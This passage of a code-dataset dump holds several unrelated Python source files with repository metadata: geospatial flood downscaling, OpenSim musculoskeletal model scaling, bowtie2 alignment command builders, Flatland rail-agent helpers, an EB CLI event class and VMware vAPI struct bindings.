    fn_regions = join(sdir, 'map', 'hires', 'location.txt')
    click.echo(fn_regions)
    regions = pd.read_csv(fn_regions, delim_whitespace=True, index_col=0).T \
        .set_index('area').astype(float).to_dict(orient='index')
    # read nc
    fn_nc = join(ddir, 'flddph*.nc')
    ds = xr.open_mfdataset(fn_nc, chunks={'time': 10})
    if dt != 0:
        ds['time'] = ds.time.to_index() + timedelta(days=dt)
    data = ds.flddph.sel(time=time).data
    data = np.where(np.isnan(data), 1e+20, data)  # mv = 1e20
    # write to bin
    # Fixed: open in binary mode -- writing bytes to a text-mode handle
    # raises TypeError on Python 3.
    datestr = '{:04d}{:02d}{:02d}'.format(t.year, t.month, t.day)
    fn_out_bin = join(sdir, basename(fn_nc).replace('*.nc', datestr))
    click.echo(fn_out_bin)
    with open(fn_out_bin, 'wb') as fid:
        fid.write(data.astype('f4').tobytes())
    # downscale
    click.echo('downscaling...')
    msg = ['./downscale_flddph', str(area), basename(fn_out_bin), '1']
    click.echo(' '.join(msg))
    subprocess.call(msg, cwd=sdir, stderr=subprocess.STDOUT)
    # open binary output
    # Fixed: read in binary mode so np.fromfile gets raw float32 bytes.
    fn_fld = join(sdir, '{:s}.flood'.format(area))
    ny, nx = int(regions[area]['ny']), int(regions[area]['nx'])
    with open(fn_fld, 'rb') as fid:
        data = np.fromfile(fid, 'f4').reshape(ny, nx)
    # write to geotiff
    fn_out_tif = join(ddir, basename(fn_out_bin) + postfix + '.tif')
    click.echo('writing to ' + fn_out_tif)
    west, north, csize = regions[area]['west'], regions[area]['north'], regions[area]['csize']
    transform = from_origin(west, north, csize, csize)
    with rasterio.open(fn_out_tif, 'w', driver='GTiff', height=data.shape[0],
                       compress='lzw', width=data.shape[1], count=1, dtype=str(data.dtype),
                       crs='+proj=latlong', transform=transform, nodata=-9999) as dst:
        dst.write(data, 1)
    # remove intermediate binary files
    os.unlink(fn_out_bin)
    os.unlink(fn_fld)


if __name__ == "__main__":
    downscale()
| 33.918919 | 94 | 0.642231 | 366 | 2,510 | 4.26776 | 0.393443 | 0.028809 | 0.03073 | 0.020487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014209 | 0.186853 | 2,510 | 73 | 95 | 34.383562 | 0.751102 | 0.067331 | 0 | 0 | 0 | 0 | 0.087983 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018519 | false | 0 | 0.203704 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb8ead9c6c7c310a5414613dd9bbb4a9dc0c78b | 5,083 | py | Python | scaling.py | samsalemi/OpenSim-Python-Simulation | f66bcce7aaaf3b4095d623b3ad2df484d123fa24 | [
"Apache-2.0"
] | 2 | 2021-11-01T20:21:23.000Z | 2021-11-26T03:14:25.000Z | scaling.py | samsalemi/OpenSim-Python-Simulation | f66bcce7aaaf3b4095d623b3ad2df484d123fa24 | [
"Apache-2.0"
] | null | null | null | scaling.py | samsalemi/OpenSim-Python-Simulation | f66bcce7aaaf3b4095d623b3ad2df484d123fa24 | [
"Apache-2.0"
] | null | null | null | # June 7 2018
# Author: Samuel Salemi
# University of Guelph Masters Graduate
# This script determines scaling factors and places them on model Gait2354
def scale():
    """Scale the generic Gait2354 OpenSim model to the subject.

    Runs the OpenSim ScaleTool (model scaler followed by marker placer)
    on the subject's static trial, writes all outputs into the subject's
    scale results directory, and copies the scaled model up into the
    subject results directory. Returns an empty tuple.
    """
    import os
    import opensim as osim
    import shutil
    import directories

    # Global Directories
    # NOTE(review): allDir index 3 is intentionally skipped here --
    # confirm the tuple layout against directories.main().
    allDir = list(directories.main(directories))
    parentDir = allDir[0]
    paramsDir = allDir[1]
    genericDir = allDir[2]
    subID = allDir[4]
    subResultsDir = allDir[5]

    # Get generic Model
    genericModel = "gait2354_LockedJoints.osim"
    genericModelFile = genericDir + "/" + genericModel
    if not os.path.exists(subResultsDir):
        os.mkdir(subResultsDir)

    # generic input XML files
    scaleSetupFull = paramsDir + "/setupScale.xml"
    markerSetFull = paramsDir + "/markerSet.xml"

    # Make scale directory if non-existent (wiped first for a clean run)
    scaleResultsDir = subResultsDir + "/scale"
    if os.path.exists(scaleResultsDir):
        shutil.rmtree(scaleResultsDir, ignore_errors=True)
    if not os.path.exists(scaleResultsDir):
        os.mkdir(scaleResultsDir)

    # Output XML Files
    outputScaleFile = subID + "_scaleFactors.xml"
    adjustedMarkerSet = subID + "_movedMarkers.xml"

    # Output Model Files
    outputModelFile = subID + ".osim"

    # Input Data Files
    dataFiles = parentDir + "/data/osDemo"
    staticMarkerFile = "subject01_static.trc"
    staticMarkerFull = dataFiles + "/" + staticMarkerFile
    shutil.copy(staticMarkerFull, scaleResultsDir + "/" + staticMarkerFile)

    # Output Data Files
    staticCoordinates = subID + "_staticCoordinates.mot"

    # Subject Measurements
    # NOTE(review): subject mass is hard-coded -- confirm it matches the
    # subject being processed.
    subjectMass = 72.60000000

    # Load Model
    aModel = osim.Model(genericModelFile)
    aModel.setName(subID)

    # Initialize System
    aModel.initSystem()
    aState = aModel.initSystem()

    # Add Marker Set
    newMarkers = osim.MarkerSet(markerSetFull)
    aModel.replaceMarkerSet(aState, newMarkers)

    # Re-initialize State (required after replacing the marker set)
    aState = aModel.initSystem()

    # Get Time Array for .trc file
    markerData = osim.MarkerData(staticMarkerFull)

    # Get Initial and Final Time
    initial_time = markerData.getStartFrameTime()
    final_time = markerData.getLastFrameTime()

    # Create an array double and apply the time range
    TimeArray = osim.ArrayDouble()
    TimeArray.set(0, initial_time)
    TimeArray.set(1, final_time)

    # Scale Tool
    scaleTool = osim.ScaleTool(scaleSetupFull)
    scaleTool.setSubjectMass(subjectMass)

    # GenericModelMaker-
    # Tell scale tool to use the loaded model
    scaleTool.getGenericModelMaker().setModelFileName(
        genericDir + "/" + genericModel)

    # # Set the Marker Set file (incase a markerset isnt attached to the model)
    scaleTool.getGenericModelMaker().setMarkerSetFileName(markerSetFull)

    # ModelScaler-
    # Whether or not to use the model scaler during scale
    scaleTool.getModelScaler().setApply(1)

    # Set the marker file (.trc) to be used for scaling
    scaleTool.getModelScaler().setMarkerFileName("/" + staticMarkerFile)

    # set a time range
    scaleTool.getModelScaler().setTimeRange(TimeArray)

    # Indicating whether or not to preserve relative mass between segments
    scaleTool.getModelScaler().setPreserveMassDist(1)

    # Name of OpenSim model file (.osim) to write when done scaling.
    scaleTool.getModelScaler().setOutputModelFileName("")

    # Filename to write scale factors that were applied to the unscaled model (optional)
    scaleTool.getModelScaler().setOutputScaleFileName(outputScaleFile)

    # Run model scaler Tool
    scaleTool.getModelScaler().processModel(
        aState, aModel, scaleResultsDir, subjectMass)

    # initialize again so the marker placer sees the scaled model state
    aState = aModel.initSystem()

    # # Marker Placer
    # # Whether or not to use the model scaler during scale
    scaleTool.getMarkerPlacer().setApply(1)

    # # Set the marker placer time range
    scaleTool.getMarkerPlacer().setTimeRange(TimeArray)

    # # Set the marker file (.trc) to be used for scaling
    scaleTool.getMarkerPlacer().setStaticPoseFileName("/" + staticMarkerFile)

    # # Return name to a variable for future use in functions
    # NOTE(review): setOutputModelFileName likely returns None, so this
    # variable appears unused -- confirm before relying on it.
    scaledAdjustedModel = scaleTool.getMarkerPlacer(
    ).setOutputModelFileName("/" + outputModelFile)

    # # Set the output motion filename
    scaleTool.getMarkerPlacer().setOutputMotionFileName("/" + staticCoordinates)

    # # Set the output xml of the marker adjustments
    scaleTool.getMarkerPlacer().setOutputMarkerFileName("/" + adjustedMarkerSet)

    # # Maximum amount of movement allowed in marker data when averaging
    scaleTool.getMarkerPlacer().setMaxMarkerMovement(-1)

    # # Run Marker Placer
    scaleTool.getMarkerPlacer().processModel(aState, aModel, scaleResultsDir)
    scaleTool.printToXML(scaleResultsDir + "/" + subID + "_setupScale.xml")

    # Clear Terminal
    os.system('cls' if os.name == 'nt' else 'clear')
    shutil.copy(scaleResultsDir + "/" + outputModelFile, subResultsDir)
    return ()
| 38.801527 | 89 | 0.69821 | 501 | 5,083 | 7.061876 | 0.391218 | 0.054268 | 0.013567 | 0.011871 | 0.072923 | 0.054833 | 0.054833 | 0.054833 | 0.054833 | 0.054833 | 0 | 0.00905 | 0.217391 | 5,083 | 130 | 90 | 39.1 | 0.880342 | 0.277592 | 0 | 0.042254 | 0 | 0 | 0.054472 | 0.013761 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014085 | false | 0 | 0.056338 | 0 | 0.084507 | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbbe34de6cfae26177dec781f0aff1524bf1b1b | 1,666 | py | Python | tirmite/bowtie2_wrappers.py | Adamtaranto/mapmite | e2e85d73fa1df3a1c5d9893f7b35bcb6f6a1558b | [
"MIT"
] | 2 | 2019-05-30T00:46:27.000Z | 2019-12-18T11:01:49.000Z | tirmite/bowtie2_wrappers.py | Adamtaranto/mapmite | e2e85d73fa1df3a1c5d9893f7b35bcb6f6a1558b | [
"MIT"
] | 10 | 2017-09-19T01:24:02.000Z | 2021-04-08T00:35:40.000Z | tirmite/bowtie2_wrappers.py | Adamtaranto/mapmite | e2e85d73fa1df3a1c5d9893f7b35bcb6f6a1558b | [
"MIT"
] | 3 | 2019-12-18T11:01:51.000Z | 2021-09-02T01:26:34.000Z | import os
from shlex import quote
def _bowtie2build_cmd(bt2Path="bowtie2-build",IdxPath="db/GenIdx",genome=None):
'''Construct the bowtie2-build command'''
# Base command
cmd = ' '.join(['mkdir db &&',quote(bt2Path),quote(os.path.abspath(genome)),IdxPath])
return cmd
def _bowtie2_cmd(bt2Path="bowtie2",tirFasta=None,IdxPath="db/GenIdx",cores=None):
'''Construct commands for bowtie2 mapping.'''
# bowtie2 -x genidx -f -a --very-sensitive-local -U TIR.fa --al alignments.bam
# Base command
cmd = ' '.join([quote(bt2Path),'-f -a --very-sensitive-local -x',IdxPath,'-U',quote(os.path.abspath(tirFasta)),'> alignments.sam'])
# Optional set cores
if cores:
cmd += ' --threads ' + str(cores)
return cmd
def _bam2bed_cmd(samPath="samtools",bedPath="bedtools",tempDir=None):
''' Filtering mapped reads with bedtools and samtools.
# Fwd hits
samtools view -b -F 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"+"}' > mapped.bed
# Rev hits
samtools view -b -f 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"-"}' >> mapped.bed
'''
# Base command
mappedPath = os.path.join(tempDir,'bowtie2mappedTIR.bed')
cmds = list()
# All reads not on rev strand or unmapped
cmds.append(' '.join([quote(samPath),"view -b -F 0x10,0x4 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"+\"}' >",quote(mappedPath)]))
# Only reads on reverse strand
cmds.append(' '.join([quote(samPath),"view -b -f 0x10 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"-\"}' >>",quote(mappedPath)]))
return cmds,mappedPath
| 47.6 | 178 | 0.676471 | 243 | 1,666 | 4.613169 | 0.374486 | 0.057984 | 0.021409 | 0.035682 | 0.371097 | 0.335415 | 0.335415 | 0.335415 | 0.335415 | 0.271186 | 0 | 0.02686 | 0.128451 | 1,666 | 34 | 179 | 49 | 0.745179 | 0.365546 | 0 | 0.125 | 0 | 0.125 | 0.324952 | 0.021277 | 0 | 0 | 0.010638 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.125 | 0 | 0.5 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbbe35054b047337e457c136d547a61c6afb53d | 2,716 | py | Python | action_blocking_helping_functions.py | netceteragroup/Flatland-Challenge | 4292e8aa778d264d025ad6d32926840864b22a21 | [
"MIT"
] | 4 | 2021-01-15T10:49:33.000Z | 2021-12-31T08:11:35.000Z | action_blocking_helping_functions.py | netceteragroup/Flatland-Challenge | 4292e8aa778d264d025ad6d32926840864b22a21 | [
"MIT"
] | null | null | null | action_blocking_helping_functions.py | netceteragroup/Flatland-Challenge | 4292e8aa778d264d025ad6d32926840864b22a21 | [
"MIT"
] | null | null | null | from envs.flatland.observations.segment_graph import Graph
def get_coords(direction):
    """Map a heading 0..3 to a (drow, dcol) grid step.

    Returns None for any other value, matching the original if-chain.
    Direction 0 steps up a row, 1 right, 2 down, 3 left -- presumably
    N/E/S/W; confirm against the environment's direction convention.
    """
    offsets = {
        0: (-1, 0),
        1: (0, 1),
        2: (1, 0),
        3: (0, -1),
    }
    return offsets.get(direction)
def stop_deadlock_when_unavoidable(timestamp_segment_dict, to_reset, handle, direction, action, action_mask, old_pos):
    """Claim the rail segment agent *handle* would enter with *action*.

    timestamp_segment_dict maps a frozenset of (row, col) cells (a track
    segment) to True while some agent holds a claim on it during the
    current step; to_reset collects segments claimed this step so they
    can be released later via reset_timestamp_dict. If the target
    segment is already claimed, a different action is chosen with
    pick_new_action (which also mutates action_mask).

    Returns the (possibly updated) dict, the to_reset list and the
    action to actually execute.
    """
    # print(obs[agent_id][8])
    dx, dy = get_new_pos_dx_dy(direction, action)
    new_pos = (old_pos[0] + dx, old_pos[1] + dy)
    # print(handle, direction, old_pos, new_pos)
    # Candidate segments reachable from the agent's current graph node.
    # NOTE(review): assumes Graph.agents/graph_global are populated for
    # this handle -- confirm against segment_graph.
    fr, to = Graph.agents[handle].CurrentNode, Graph.agents[handle].NextNodes
    segments = []
    for node in to:
        segments.append(Graph.graph_global[fr][node]['segment'])
    curr_segment = None
    # Find which candidate segment contains the next position. The break
    # only exits the inner loop, so if several segments contained
    # new_pos, the last matching one would win.
    for segment in segments:
        for x, y, _ in segment:
            if new_pos == (x, y):
                curr_segment = segment
                break
    if curr_segment is None:
        # Next position is not on any outgoing segment: nothing to claim.
        return timestamp_segment_dict, to_reset, action
    # Hashable cell set identifying the segment (directions dropped).
    curr_segment = frozenset((x, y) for x, y, _ in curr_segment)
    if curr_segment not in timestamp_segment_dict or not timestamp_segment_dict[curr_segment]:
        timestamp_segment_dict[curr_segment] = True
        # print(f"occupied by {handle} segment: {curr_segment}")
        to_reset.append(curr_segment)
    else:
        # Segment already claimed this step: divert to another action.
        # print(f"old action was {action}")
        action = pick_new_action(action, action_mask)
        # print(f"new action is {action}")
    return timestamp_segment_dict, to_reset, action
def reset_timestamp_dict(timestamp_segment_dict, to_reset):
    """Release every segment claim listed in *to_reset*.

    Mutates the dict in place (each listed segment is set to False)
    and returns the same dict object.
    """
    # print(f"removing segment {segment}")
    timestamp_segment_dict.update((segment, False) for segment in to_reset)
    return timestamp_segment_dict
def pick_new_action(old_action, action_mask):
    """Pick the lowest-numbered allowed action other than *old_action*.

    Actions are 1-based: action_mask[i] == 1 means action i+1 is
    allowed. Both the previously chosen action and the action at index 3
    (presumably "stop" -- confirm against the env's action enum) are
    treated as unavailable. Falls back to *old_action* when no
    alternative remains.

    Fixed: works on a local copy so the caller's mask is no longer
    mutated, and tolerates masks shorter than four entries.
    """
    mask = list(action_mask)
    mask[old_action - 1] = 0
    if len(mask) > 3:
        mask[3] = 0
    for index, allowed in enumerate(mask):
        if allowed == 1:
            return index + 1
    return old_action
def get_new_pos_dx_dy(direc, action):
    """Translate (heading, action) into a (drow, dcol) grid step.

    For each heading, action 2 matches get_coords(direc) (move
    straight), while actions 1 and 3 step toward the left/right
    neighbouring headings. Unknown combinations yield None, exactly
    like the original if-chain.
    """
    moves = {
        (0, 1): (0, -1), (0, 2): (-1, 0), (0, 3): (0, 1),
        (1, 1): (-1, 0), (1, 2): (0, 1),  (1, 3): (1, 0),
        (2, 1): (0, 1),  (2, 2): (1, 0),  (2, 3): (0, -1),
        (3, 1): (1, 0),  (3, 2): (0, -1), (3, 3): (-1, 0),
    }
    return moves.get((direc, action))
| 29.846154 | 118 | 0.591679 | 375 | 2,716 | 4.088 | 0.192 | 0.067841 | 0.117417 | 0.039139 | 0.313112 | 0.193085 | 0.193085 | 0.142205 | 0.142205 | 0.142205 | 0 | 0.033636 | 0.310383 | 2,716 | 90 | 119 | 30.177778 | 0.784837 | 0.082842 | 0 | 0.416667 | 0 | 0 | 0.002818 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0 | 0.013889 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbd4529c7fa51f7002af4f36973add53c6da978 | 997 | py | Python | venv/lib/python2.7/site-packages/ebcli/objects/event.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 4 | 2018-04-19T19:56:53.000Z | 2021-06-28T19:53:41.000Z | venv/lib/python2.7/site-packages/ebcli/objects/event.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 1 | 2020-06-03T13:57:07.000Z | 2020-06-22T10:27:48.000Z | venv/lib/python2.7/site-packages/ebcli/objects/event.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 3 | 2018-07-30T05:34:42.000Z | 2019-04-30T20:02:54.000Z | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
class Event():
    """Value object holding the fields of one Elastic Beanstalk event.

    Every constructor argument is stored verbatim as an attribute of
    the same name; all default to None.
    """

    def __init__(self, message=None, event_date=None, version_label=None,
                 app_name=None, environment_name=None, severity=None, platform=None):
        for name, value in (('message', message),
                            ('event_date', event_date),
                            ('version_label', version_label),
                            ('app_name', app_name),
                            ('environment_name', environment_name),
                            ('severity', severity),
                            ('platform', platform)):
            setattr(self, name, value)
| 39.88 | 85 | 0.718154 | 141 | 997 | 4.964539 | 0.524823 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.205617 | 997 | 24 | 86 | 41.541667 | 0.873737 | 0.537613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbdb2606c7d9fbb6e570e314eadff3809426b49 | 13,493 | py | Python | com/vmware/vapi/bindings/struct.py | sumitrsystems/Vmware | 7705d9979bee71f02c71d63890616409044cba08 | [
"MIT"
] | null | null | null | com/vmware/vapi/bindings/struct.py | sumitrsystems/Vmware | 7705d9979bee71f02c71d63890616409044cba08 | [
"MIT"
] | null | null | null | com/vmware/vapi/bindings/struct.py | sumitrsystems/Vmware | 7705d9979bee71f02c71d63890616409044cba08 | [
"MIT"
] | null | null | null | """
Bindings data classes
"""
__author__ = 'VMware, Inc.'
__copyright__ = 'Copyright 2015-2016 VMware, Inc. All rights reserved. -- VMware Confidential' # pylint: disable=line-too-long
import decimal
import json
import six
import sys
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.serializers import cleanjson
from vmware.vapi.data.value import StructValue
from vmware.vapi.lib.converter import Converter
# TODO: Split this into static and dynamic structures.
class VapiStruct(object):
    """
    Representation of IDL Structure in python language bindings
    """
    # Validators run over the StructValue in validate_struct_value();
    # generated binding subclasses override this list.
    _validator_list = []

    # Dict of canonical to pep names for fields whose canonical name does not
    # match the pep name
    _canonical_to_pep_names = {}

    def __init__(self, struct_value=None, rest_converter_mode=None):
        """
        Initialize VapiStruct

        :type mappings: :class:`dict` or :class:`None`
        :param mappings: A mapping for all field names whose canonical name does
            not match PEP8 standard name
        :type rest_converter_mode: :class:`str` or :class:`None`
        :param rest_converter_mode: Converter mode to be used to be be
            compatible for Vapi Rest. If None or unknown string value,
            then the default Json Rpc converter is used
        :type struct_value: :class:`vmware.vapi.data.value.StructValue`
        :param struct_value: StructValue to be used for VapiStruct
            or :class:`None`
        """
        # fields will either be in native form or in unknown
        # fields
        self._extra_fields = None

        # A non-None struct_value marks this instance as "dynamic": the
        # raw StructValue is kept and returned by get_struct_value().
        if (struct_value is not None and
                not isinstance(struct_value, StructValue)):
            raise TypeError(
                'struct_value must be of type '
                + '\'vmware.vapi.data.value.StructValue\' or None')
        self._struct_value = struct_value
        self._rest_converter_mode = rest_converter_mode

    def get_field(self, attr):
        """
        Returns the struct field value

        :type attr: :class:`str`
        :param attr: Canonical field name
        :rtype: :class:`object`
        :return: Field value
        """
        # Translate the wire (canonical) name to the python attribute
        # name when they differ.
        if (self._canonical_to_pep_names and
                attr in self._canonical_to_pep_names):
            return getattr(self, self._canonical_to_pep_names[attr])
        else:
            return getattr(self, attr)

    @classmethod
    def validate_struct_value(cls, struct_value):
        """
        Validate if the given struct value satisfies all
        the constraints of this VapiStruct.

        :type struct_value: :class:`vmware.vapi.data.value.StructValue`
        :param struct_value: StructValue to be validated
        :type validators: :class:`list` of
            :class:`vmware.vapi.data.validator.Validator`
        :param validators: List of validators
        :raise :class:`vmware.vapi.exception.CoreException` if a constraint is
            not satisfied
        """
        if cls._validator_list:
            for validator in cls._validator_list:
                msg_list = validator.validate(struct_value, None)
                raise_core_exception(msg_list)

    def validate_constraints(self):
        """
        Validate if the current VapiStruct instance satisfies all the
        constraints of this VapiStruct type.

        :raise :class:`vmware.vapi.exception.CoreException` if a constraint is
            not satisfied
        """
        struct_value = self.get_struct_value()
        self.validate_struct_value(struct_value)

    @classmethod
    def get_binding_type(cls):
        """
        Returns the corresponding BindingType for the VapiStruct class

        :rtype: :class:`vmware.vapi.bindings.type.BindingType`
        :return: BindingType for this VapiStruct
        """
        return getattr(cls, '_binding_type', None)

    @classmethod
    def _set_binding_type(cls, binding_type):
        """
        Set the underlying BindingType for this VapiStruct.

        :type binding_type: :class:`vmware.vapi.bindings.type.BindingType`
        :param binding_type: BindingType for this VapiStruct
        """
        cls._binding_type = binding_type

    def get_struct_value(self):
        """
        Returns the corresponding StructValue for the VapiStruct class

        :rtype: :class:`vmware.vapi.data.value.StructValue`
        :return: StructValue for this VapiStruct
        """
        # For dynamic structures
        if self._struct_value:
            return self._struct_value
        else:
            # For static structures import TypeConverter here since
            # otherwise it causes circular imports
            from vmware.vapi.bindings.converter import TypeConverter
            struct_value = TypeConverter.convert_to_vapi(
                py_val=self, binding_type=self._binding_type)
            return struct_value

    def _get_extra_fields(self):
        """
        Get the fields that are not part of the static definition for this
        VapiStruct. This is an internal method and should only be used by vAPI
        runtime.

        :rtype :class:`dict` of :class:`str` and
            :class:`vmware.vapi.data.value.DataValue`
        :return Fields not part of the static definition for this VapiStruct
        """
        return self._extra_fields or {}

    def _set_extra_fields(self, extra_fields=None):
        """
        Set the fields that are not part of the static definition for this
        VapiStruct. This is an internal method and should only be used by vAPI
        runtime.

        :type extra_fields: :class:`dict` of :class:`str` and
            :class:`vmware.vapi.data.value.DataValue` or :class:`None`
        :param extra_fields: Fields not part of the static definition for
            this VapiStruct
        """
        self._extra_fields = extra_fields

    @classmethod
    def _get_pep_name(cls, canonical_name):
        """
        Return the pep name for the provided canonical name

        :rtype: :class:`str`
        :return: Pep name used in the binding
        """
        # Explicit mapping wins; otherwise fall back to the generic
        # canonical -> PEP8 conversion.
        if (cls._canonical_to_pep_names
                and canonical_name in cls._canonical_to_pep_names):
            return cls._canonical_to_pep_names[canonical_name]
        else:
            return Converter.canonical_to_pep(canonical_name)

    def convert_to(self, cls):
        """
        Convert the underlying StructValue to an instance of the provided class
        if possible. Conversion will be possible if the StructValue contains
        all the fields expected by the provided class and the type of the value
        in each fields matches the type of the field expected by the provided
        class.

        :type cls: :class:`vmware.vapi.data.value.StructValue`
        :param cls: The type to convert to
        :rtype: :class:'vmware.vapi.bindings.struct.VapiStruct'
        :return: The converted value
        """
        # Import TypeConverter here since otherwise it causes circular imports
        from vmware.vapi.bindings.converter import TypeConverter
        return TypeConverter.convert_to_python(
            vapi_val=self.get_struct_value(),
            binding_type=cls.get_binding_type(),
            rest_converter_mode=self._rest_converter_mode)

    def to_json(self):
        """
        Convert the object into a json string.

        :rtype: :class:`str`
        :return: JSON string representation of this object
        """
        struct_value = self.get_struct_value()
        return cleanjson.DataValueConverter.convert_to_json(struct_value)

    def to_dict(self):
        """
        Convert the object into a python dictionary. Even the nested types
        are converted to dictionaries.

        :rtype: :class:`dict`
        :return: Dictionary representation of this object
        """
        # TODO: Implement native converter from DataValue -> Dictionary
        # to improve performance if it is used heavily
        # parse_float keeps decimal precision instead of binary floats.
        return json.loads(self.to_json(), parse_float=decimal.Decimal)

    def _get_attrs(self):
        """
        Returns the attributes of the vAPI structure object

        :rtype: :class:`list` of :class:`str`
        :return: List of attributes of this object
        """
        # Using getmembers in inspect to return all the attributes
        # of this object. And later filter those to get only the
        # public data attributes
        return [k for k in six.iterkeys(vars(self))
                if not k.startswith('_')]

    def __eq__(self, other):
        # NOTE(review): compares only public instance attributes and does
        # not check types -- a non-VapiStruct `other` missing an attribute
        # raises AttributeError rather than returning False.
        if other is None:
            return False
        for attr in self._get_attrs():
            if getattr(self, attr) != getattr(other, attr):
                return False
        return True

    def __ne__(self, other):
        return not (self == other)

    def __repr__(self):
        class_name = self.__class__.__name__
        attrs = self._get_attrs()
        result = ', '.join(
            ['%s=%s' % (attr, repr(getattr(self, attr)))
             for attr in attrs])
        return '%s(%s)' % (class_name, result)

    def __str__(self):
        attrs = self._get_attrs()
        result = ', '.join(
            ['%s : %s' % (attr, str(getattr(self, attr)))
             for attr in attrs])
        return '{%s}' % result

    def __hash__(self):
        # Hash is derived from the string form; consistent with __eq__
        # only insofar as equal structs stringify identically.
        return str(self).__hash__()
class PrettyPrinter(object):
    """
    Helper class to pretty print Python native values (with special support
    for VapiStruct objects).
    """
    def __init__(self, stream=sys.stdout, indent=2):
        """
        Initialize PrettyPrinter

        :type stream: :class:`object`
        :param stream: A stream object that implements File protocol's
            write operation
        :type indent: :class:`int`
        :param indent: Indentation to be used for new lines
        """
        self._stream = stream
        self._indent = indent

    def pprint(self, value, level=0):
        """
        Print a Python native value

        :type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
        :param value: VapiStruct to be pretty printed
        :type level: :class:`int`
        :param level: Indentation level
        """
        self._process_value(value, level)

    def _print_level(self, value, level, newline=True):
        """
        Print data at a given identation level

        :type value: :class:`str`
        :param value: String to be printed
        :type level: :class:`int`
        :param level: Indentation level
        :type newline: :class:`bool`
        :param newline: If true, prints a new line after the data. If false,
            only prints the data
        """
        if level:
            self._stream.write(' ' * level + value)
        else:
            self._stream.write(value)
        if newline:
            self._stream.write('\n')

    def _process_value(self, value, level=0):
        """
        Process a value

        :type value: :class:`object`
        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        # Dispatch by type; containers recurse (mutually) with an extra
        # level of indentation, scalars are printed inline.
        if isinstance(value, VapiStruct):
            self._pprint_struct(value, level + self._indent)
        elif isinstance(value, dict):
            self._pprint_dict(value, level + self._indent)
        elif isinstance(value, list):
            self._pprint_list(value, level + self._indent)
        elif isinstance(value, six.string_types):
            self._print_level("'%s'," % value, 0)
        elif isinstance(value, six.integer_types):
            self._print_level('%s,' % value, 0)
        elif value is None:
            self._print_level('None,', 0)
        else:
            self._print_level('%s,' % value, level)

    def _pprint_struct(self, value, level=0):
        """
        Pretty print a struct

        :type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        class_name = value.__class__.__name__
        self._print_level(class_name + '(', 0)
        # Fields are emitted in sorted order for stable output; uses the
        # struct's private attribute listing deliberately.
        for k in sorted(value._get_attrs()):  # pylint: disable=W0212
            v = getattr(value, k)
            self._print_level('%s=' % k, level, False)
            self._process_value(v, level)
        self._print_level('),', level - self._indent)

    def _pprint_dict(self, value, level=0):
        """
        Pretty print a dictionary

        :type value: :class:`dict`
        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        if not value:
            # Empty dict collapses to a single token.
            self._print_level('{},', 0)
            return

        self._print_level('{', 0)
        for k in sorted(value.keys()):
            self._print_level("'%s':" % k, level, False)
            self._process_value(value[k], level)
        self._print_level('},', level - self._indent)

    def _pprint_list(self, value, level=0):
